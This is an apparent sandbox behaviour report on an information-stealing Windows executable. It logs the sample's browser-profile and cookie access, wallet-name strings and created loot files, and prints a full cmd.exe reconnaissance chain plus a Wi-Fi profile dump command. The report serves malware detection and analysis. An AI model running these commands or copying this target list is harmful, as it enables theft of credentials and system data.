                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108 VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XboxGameBar VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ssl.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ssl.pyd VolumeInformation
                      Source: C:\Windows\System32\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeCode function: 0_2_00007FF677EBC7F0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF677EBC7F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC81B90 PyExc_RuntimeError,PyErr_SetString,Py_GetVersion,PyOS_snprintf,PyTuple_New,PyOS_snprintf,PyErr_WarnEx,PyBytes_FromStringAndSize,PyUnicode_FromStringAndSize,PyModule_GetDict,PyImport_AddModule,PyImport_AddModule,PyObject_SetAttrString,PyUnicode_InternFromString,PyUnicode_Decode,PyUnicode_FromStringAndSize,PyBytes_FromStringAndSize,PyObject_Hash,PyObject_SetAttr,PyImport_GetModuleDict,PyDict_GetItemString,PyDict_SetItemString,PyObject_GetAttr,PyExc_NameError,PyErr_Format,PyTuple_Pack,PyImport_ImportModule,_Py_Dealloc,PyImport_ImportModule,_Py_Dealloc,PyImport_ImportModule,_Py_Dealloc,PyCMethod_New,PyDict_SetItem,_Py_Dealloc,PyDict_New,PyDict_SetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyErr_Occurred,PyExc_ImportError,PyErr_SetString,58_2_00007FF81EC81B90
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0000003A.00000002.1621186652.0000010BE9018000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000002.1621510779.0000010BE90D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1538910940.000001E3006F8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1539604466.000001E3007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 7988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 8168, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 2956, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Cookies.txtJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\network_info.txtJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txtJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txtJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile created: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\process_info.txtJump to behavior
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aElectrum
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aJaxx
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aExodus
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aEthereum
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: akeystore
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -anoJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.defaultJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MaskableJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MaskableJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashes\eventsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.filesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfakJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MonochromeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MonochromeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\IconsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\IconsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-shmJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MaskableJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\defaultJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archivedJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons MaskableJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\minidumpsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MonochromeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\security_stateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-walJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shmJump to behavior
